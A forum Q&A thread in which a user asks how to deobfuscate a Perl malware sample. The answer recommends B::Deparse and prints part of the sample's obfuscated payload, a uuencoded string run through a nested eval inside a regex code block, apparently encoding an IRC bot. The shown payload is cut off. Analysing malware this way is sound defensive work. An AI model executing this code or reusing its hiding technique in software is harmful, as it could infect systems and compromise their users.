Perl Deobsfuscation of malware

Question

I've found some malware and would like to analyse it further. How could I deobsfuscate this? http://bpaste.net/raw/142790/

Thanks. :)

Answer 1

You can try with Deparse,

perl -MO=Deparse malware.pl

So it uses double eval inside regex code block,

'' =~ /(?{eval"eval unpack u=>q\{_;7DD<')O8V5S<V\\](EQX-D%<>#8Q7'\@W-EQX-C\$B.VUY)&QI;F%S7VUA>#TB7'\@S,5QX,S`B.VUY)'-L965P_\/2)<>#,S(CMM>4!H;W-T875T:#TH(EQX,D\$B*3MM>4!C86YA:7,]*\")<>#(S7'\@R,UQX-S!<>#8U7'\@W,EQX_-D,B*3MM>4!N:6-K;F%M93UG
971N:6-K*\"D[;7DD;FEC:STD;FEC:VYA;65;<F%N9\"!S8V%L87)`;FEC:VYA_;65=.VUY0'!R:79N86UE\/6=E=&]N;W=N97(H*3MM>21I<F-N86UE\/21P<FEV;F%M95MR86YD('-C86QA<D!P_<FEV;F%M95T[8VAO<\"AM>21R96%L;F%M93TB7'\@T15QX-CE<>#4X(BD[;7DD<V5R=FED;W(](EQX,S9<>#,V_

...